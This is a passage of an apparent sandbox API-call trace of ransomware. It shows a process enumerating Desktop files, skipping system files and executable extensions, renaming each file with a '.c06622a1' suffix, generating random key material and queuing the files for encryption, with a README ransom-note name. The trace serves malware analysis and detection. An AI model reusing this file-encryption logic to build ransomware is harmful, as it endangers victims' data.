_Str2="8TzcRc4KQBgmUVZe.avi") returned 42 [0155.871] wcslen (_String="bootfont.bin") returned 0xc [0155.871] _wcsicmp (_Str1="bootsect.bak", _Str2="8TzcRc4KQBgmUVZe.avi") returned 42 [0155.871] wcslen (_String="bootsect.bak") returned 0xc [0155.871] _wcsicmp (_Str1="desktop.ini", _Str2="8TzcRc4KQBgmUVZe.avi") returned 44 [0155.871] wcslen (_String="desktop.ini") returned 0xb [0155.871] _wcsicmp (_Str1="iconcache.db", _Str2="8TzcRc4KQBgmUVZe.avi") returned 49 [0155.871] wcslen (_String="iconcache.db") returned 0xc [0155.871] _wcsicmp (_Str1="ntldr", _Str2="8TzcRc4KQBgmUVZe.avi") returned 54 [0155.871] wcslen (_String="ntldr") returned 0x5 [0155.871] _wcsicmp (_Str1="ntuser.dat", _Str2="8TzcRc4KQBgmUVZe.avi") returned 54 [0155.871] wcslen (_String="ntuser.dat") returned 0xa [0155.871] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8TzcRc4KQBgmUVZe.avi") returned 54 [0155.871] wcslen (_String="ntuser.dat.log") returned 0xe [0155.871] _wcsicmp (_Str1="ntuser.ini", _Str2="8TzcRc4KQBgmUVZe.avi") returned 54 [0155.871] wcslen (_String="ntuser.ini") returned 0xa [0155.871] _wcsicmp (_Str1="thumbs.db", _Str2="8TzcRc4KQBgmUVZe.avi") returned 60 [0155.871] wcslen (_String="thumbs.db") returned 0x9 [0155.871] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0155.871] wcslen (_String="386") returned 0x3 [0155.871] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0155.871] wcslen (_String="adv") returned 0x3 [0155.871] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0155.871] wcslen (_String="ani") returned 0x3 [0155.871] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0155.871] wcslen (_String="bat") returned 0x3 [0155.871] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0155.871] wcslen (_String="bin") returned 0x3 [0155.871] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0155.871] wcslen (_String="cab") returned 0x3 [0155.871] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0155.871] wcslen (_String="cmd") returned 0x3 [0155.871] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0155.871] wcslen (_String="com") returned 0x3 [0155.872] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0155.872] wcslen (_String="cpl") returned 0x3 [0155.872] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0155.872] wcslen (_String="cur") returned 0x3 [0155.872] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0155.872] wcslen (_String="deskthemepack") returned 0xd [0155.872] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0155.872] wcslen (_String="diagcab") returned 0x7 [0155.872] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0155.872] wcslen (_String="diagcfg") returned 0x7 [0155.872] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0155.872] wcslen (_String="diagpkg") returned 0x7 [0155.872] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0155.872] wcslen (_String="dll") returned 0x3 [0155.872] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0155.872] wcslen (_String="drv") returned 0x3 [0155.872] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0155.872] wcslen (_String="exe") returned 0x3 [0155.872] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0155.872] wcslen (_String="hlp") returned 0x3 [0155.872] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0155.872] wcslen (_String="icl") returned 0x3 [0155.872] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0155.872] wcslen (_String="icns") returned 0x4 [0155.872] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0155.872] wcslen (_String="ico") returned 0x3 [0155.872] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0155.872] wcslen (_String="ics") returned 0x3 [0155.872] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0155.872] wcslen (_String="idx") returned 0x3 [0155.872] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0155.872] wcslen (_String="ldf") returned 0x3 [0155.872] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0155.872] wcslen (_String="lnk") returned 0x3 [0155.872] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0155.872] wcslen (_String="mod") returned 0x3 [0155.872] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0155.872] wcslen (_String="mpa") returned 0x3 [0155.873] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0155.873] wcslen (_String="msc") returned 0x3 [0155.873] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0155.873] wcslen (_String="msp") returned 0x3 [0155.873] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0155.873] wcslen (_String="msstyles") returned 0x8 [0155.873] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0155.873] wcslen (_String="msu") returned 0x3 [0155.873] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0155.873] wcslen (_String="nls") returned 0x3 [0155.873] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0155.873] wcslen (_String="nomedia") returned 0x7 [0155.873] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0155.873] wcslen (_String="ocx") returned 0x3 [0155.873] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0155.873] wcslen (_String="prf") returned 0x3 [0155.873] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0155.873] wcslen (_String="ps1") returned 0x3 [0155.873] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0155.873] wcslen (_String="rom") returned 0x3 [0155.873] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0155.873] wcslen (_String="rtp") returned 0x3 [0155.873] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0155.873] wcslen (_String="scr") returned 0x3 [0155.873] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0155.873] wcslen (_String="shs") returned 0x3 [0155.873] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0155.873] wcslen (_String="spl") returned 0x3 [0155.873] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0155.873] wcslen (_String="sys") returned 0x3 [0155.873] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0155.873] wcslen (_String="theme") returned 0x5 [0155.873] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0155.873] wcslen (_String="themepack") returned 0x9 [0155.873] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0155.873] wcslen (_String="wpx") returned 0x3 [0155.873] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0155.874] wcslen (_String="lock") returned 0x4 [0155.874] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0155.874] wcslen (_String="key") returned 0x3 [0155.874] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0155.874] wcslen (_String="hta") returned 0x3 [0155.874] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0155.874] wcslen (_String="msi") returned 0x3 [0155.874] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0155.874] wcslen (_String="pdb") returned 0x3 [0155.874] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0155.874] wcslen (_String="sqlite") returned 0x6 [0155.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.874] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.874] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.874] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.874] wcscpy (in: _Dest=0x208e74, _Source="8TzcRc4KQBgmUVZe.avi" | out: _Dest="8TzcRc4KQBgmUVZe.avi") returned="8TzcRc4KQBgmUVZe.avi" [0155.874] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi", dwFileAttributes=0x80) returned 1 [0155.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8tzcrc4kqbgmuvze.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0155.874] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.874] ReadFile (in: hFile=0x1ac, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.875] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x4b30f088 [0155.875] RtlComputeCrc32 (PartialCrc=0xf088, Buffer=0x32ec24, Length=0x80) returned 0xf4572dbb [0155.875] RtlComputeCrc32 (PartialCrc=0x2dbb, Buffer=0x32ec24, Length=0x80) returned 0xc9da8cd8 [0155.875] RtlComputeCrc32 (PartialCrc=0x8cd8, Buffer=0x32ec24, Length=0x80) returned 0x6482f03a [0155.875] RtlComputeCrc32 (PartialCrc=0xf03a, Buffer=0x32ec24, Length=0x80) returned 0x448b996a [0155.875] CloseHandle (hObject=0x1ac) returned 1 [0155.875] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.875] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi" [0155.875] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi") returned 0x3e [0155.876] wcscpy (in: _Dest=0x218ea4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.876] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8tzcrc4kqbgmuvze.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8tzcrc4kqbgmuvze.avi.c06622a1"), dwFlags=0x8) returned 1 [0155.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TzcRc4KQBgmUVZe.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8tzcrc4kqbgmuvze.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0155.878] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.878] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3750020 [0155.885] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1bc2f305 [0155.885] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x255f9c69 [0155.885] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8ff90b5 [0155.885] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ee967b6 [0155.885] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f6746ca [0155.885] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2358c7f5 [0155.885] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x780ddd61 [0155.885] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27431d76 [0155.888] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3750094, Length=0x80) returned 0xc93104cf [0155.888] RtlComputeCrc32 (PartialCrc=0x4cf, Buffer=0x3750094, Length=0x80) returned 0x7f7124cb [0155.888] RtlComputeCrc32 (PartialCrc=0x24cb, Buffer=0x3750094, Length=0x80) returned 0x748cbc01 [0155.888] RtlComputeCrc32 (PartialCrc=0xbc01, Buffer=0x3750094, Length=0x80) returned 0x615f5d57 [0155.888] RtlComputeCrc32 (PartialCrc=0x5d57, Buffer=0x3750094, Length=0x80) returned 0x64213ea4 [0155.888] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0155.888] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.888] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.888] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c0401e0, ftCreationTime.dwHighDateTime=0x1d5e1be, ftLastAccessTime.dwLowDateTime=0xeea1ae10, ftLastAccessTime.dwHighDateTime=0x1d5e297, ftLastWriteTime.dwLowDateTime=0xeea1ae10, ftLastWriteTime.dwHighDateTime=0x1d5e297, nFileSizeHigh=0x0, nFileSizeLow=0x18f9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="98J92AdoDuoGu.bmp", cAlternateFileName="98J92A~1.BMP")) returned 1 [0155.888] _wcsicmp (_Str1="98J92AdoDuoGu.bmp", _Str2="README.c06622a1.TXT") returned -57 [0155.888] wcsstr (_Str="98J92AdoDuoGu.bmp", _SubStr="README") returned 0x0 [0155.888] _wcsicmp (_Str1="autorun.inf", _Str2="98J92AdoDuoGu.bmp") returned 40 [0155.888] wcslen (_String="autorun.inf") returned 0xb [0155.888] _wcsicmp (_Str1="boot.ini", _Str2="98J92AdoDuoGu.bmp") returned 41 [0155.888] wcslen (_String="boot.ini") returned 0x8 [0155.888] _wcsicmp (_Str1="bootfont.bin", _Str2="98J92AdoDuoGu.bmp") returned 41 [0155.888] wcslen (_String="bootfont.bin") returned 0xc [0155.889] _wcsicmp (_Str1="bootsect.bak", _Str2="98J92AdoDuoGu.bmp") returned 41 [0155.889] wcslen (_String="bootsect.bak") returned 0xc [0155.889] _wcsicmp (_Str1="desktop.ini", _Str2="98J92AdoDuoGu.bmp") returned 43 [0155.889] wcslen (_String="desktop.ini") returned 0xb [0155.889] _wcsicmp (_Str1="iconcache.db", _Str2="98J92AdoDuoGu.bmp") returned 48 [0155.889] wcslen (_String="iconcache.db") returned 0xc [0155.889] _wcsicmp (_Str1="ntldr", _Str2="98J92AdoDuoGu.bmp") returned 53 [0155.889] wcslen (_String="ntldr") returned 0x5 [0155.889] _wcsicmp (_Str1="ntuser.dat", _Str2="98J92AdoDuoGu.bmp") returned 53 [0155.889] wcslen (_String="ntuser.dat") returned 0xa [0155.889] _wcsicmp (_Str1="ntuser.dat.log", _Str2="98J92AdoDuoGu.bmp") returned 53 [0155.889] wcslen (_String="ntuser.dat.log") returned 0xe [0155.889] _wcsicmp (_Str1="ntuser.ini", _Str2="98J92AdoDuoGu.bmp") returned 53 [0155.889] wcslen (_String="ntuser.ini") returned 0xa [0155.889] _wcsicmp (_Str1="thumbs.db", _Str2="98J92AdoDuoGu.bmp") returned 59 [0155.889] wcslen (_String="thumbs.db") returned 0x9 [0155.889] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.889] wcslen (_String="386") returned 0x3 [0155.889] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.889] wcslen (_String="adv") returned 0x3 [0155.889] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.889] wcslen (_String="ani") returned 0x3 [0155.889] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.889] wcslen (_String="bat") returned 0x3 [0155.889] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.889] wcslen (_String="bin") returned 0x3 [0155.889] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.889] wcslen (_String="cab") returned 0x3 [0155.889] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.889] wcslen (_String="cmd") returned 0x3 [0155.889] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.889] wcslen (_String="com") returned 0x3 [0155.889] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.889] wcslen (_String="cpl") returned 0x3 [0155.889] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.890] wcslen (_String="cur") returned 0x3 [0155.890] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.890] wcslen (_String="deskthemepack") returned 0xd [0155.890] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.890] wcslen (_String="diagcab") returned 0x7 [0155.890] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.890] wcslen (_String="diagcfg") returned 0x7 [0155.890] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.890] wcslen (_String="diagpkg") returned 0x7 [0155.890] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.890] wcslen (_String="dll") returned 0x3 [0155.890] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.890] wcslen (_String="drv") returned 0x3 [0155.890] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.890] wcslen (_String="exe") returned 0x3 [0155.890] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.890] wcslen (_String="hlp") returned 0x3 [0155.890] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.890] wcslen (_String="icl") returned 0x3 [0155.890] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.890] wcslen (_String="icns") returned 0x4 [0155.890] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.890] wcslen (_String="ico") returned 0x3 [0155.890] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.890] wcslen (_String="ics") returned 0x3 [0155.890] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.890] wcslen (_String="idx") returned 0x3 [0155.890] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.890] wcslen (_String="ldf") returned 0x3 [0155.890] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.890] wcslen (_String="lnk") returned 0x3 [0155.890] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.890] wcslen (_String="mod") returned 0x3 [0155.890] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.890] wcslen (_String="mpa") returned 0x3 [0155.890] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.891] wcslen (_String="msc") returned 0x3 [0155.891] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.891] wcslen (_String="msp") returned 0x3 [0155.891] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.891] wcslen (_String="msstyles") returned 0x8 [0155.891] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.891] wcslen (_String="msu") returned 0x3 [0155.891] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.891] wcslen (_String="nls") returned 0x3 [0155.891] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.891] wcslen (_String="nomedia") returned 0x7 [0155.891] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.891] wcslen (_String="ocx") returned 0x3 [0155.891] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.891] wcslen (_String="prf") returned 0x3 [0155.891] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.891] wcslen (_String="ps1") returned 0x3 [0155.891] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.891] wcslen (_String="rom") returned 0x3 [0155.891] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.891] wcslen (_String="rtp") returned 0x3 [0155.891] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.891] wcslen (_String="scr") returned 0x3 [0155.891] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.891] wcslen (_String="shs") returned 0x3 [0155.891] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.891] wcslen (_String="spl") returned 0x3 [0155.891] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.891] wcslen (_String="sys") returned 0x3 [0155.891] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.891] wcslen (_String="theme") returned 0x5 [0155.891] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.892] wcslen (_String="themepack") returned 0x9 [0155.892] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.892] wcslen (_String="wpx") returned 0x3 [0155.892] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.892] wcslen (_String="lock") returned 0x4 [0155.892] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.892] wcslen (_String="key") returned 0x3 [0155.892] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.892] wcslen (_String="hta") returned 0x3 [0155.892] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.892] wcslen (_String="msi") returned 0x3 [0155.892] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.892] wcslen (_String="pdb") returned 0x3 [0155.892] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.892] wcslen (_String="sqlite") returned 0x6 [0155.892] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.892] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.892] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.892] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.892] wcscpy (in: _Dest=0x208e74, _Source="98J92AdoDuoGu.bmp" | out: _Dest="98J92AdoDuoGu.bmp") returned="98J92AdoDuoGu.bmp" [0155.892] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp", dwFileAttributes=0x80) returned 1 [0155.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\98j92adoduogu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0155.893] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.893] ReadFile (in: hFile=0x1c8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.893] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x2b2875e6 [0155.893] RtlComputeCrc32 (PartialCrc=0x75e6, Buffer=0x32ec24, Length=0x80) returned 0xc58cf9bd [0155.893] RtlComputeCrc32 (PartialCrc=0xf9bd, Buffer=0x32ec24, Length=0x80) returned 0xee041eb [0155.893] RtlComputeCrc32 (PartialCrc=0x41eb, Buffer=0x32ec24, Length=0x80) returned 0x9834eab4 [0155.893] RtlComputeCrc32 (PartialCrc=0xeab4, Buffer=0x32ec24, Length=0x80) returned 0x2c38be04 [0155.894] CloseHandle (hObject=0x1c8) returned 1 [0155.894] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.894] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp" [0155.894] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp") returned 0x3b [0155.894] wcscpy (in: _Dest=0x218e9e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.894] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\98j92adoduogu.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\98j92adoduogu.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98J92AdoDuoGu.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\98j92adoduogu.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0155.896] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.896] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37e0020 [0155.903] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x70d8d377 [0155.903] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x771bf33 [0155.903] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x42bf13c5 [0155.903] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ee99f15 [0155.903] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7fffb80b [0155.903] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6cd3e5e [0155.903] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24430826 [0155.903] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3571bf97 [0155.906] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37e0094, Length=0x80) returned 0x95d0a69e [0155.906] RtlComputeCrc32 (PartialCrc=0xa69e, Buffer=0x37e0094, Length=0x80) returned 0x406dbec5 [0155.906] RtlComputeCrc32 (PartialCrc=0xbec5, Buffer=0x37e0094, Length=0x80) returned 0x523ae67d [0155.906] RtlComputeCrc32 (PartialCrc=0xe67d, Buffer=0x37e0094, Length=0x80) returned 0x97166c23 [0155.906] RtlComputeCrc32 (PartialCrc=0x6c23, Buffer=0x37e0094, Length=0x80) returned 0xd5f17c22 [0155.906] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0155.906] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.906] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.906] FindNextFileW (in: hFindFile=0x1327c8, 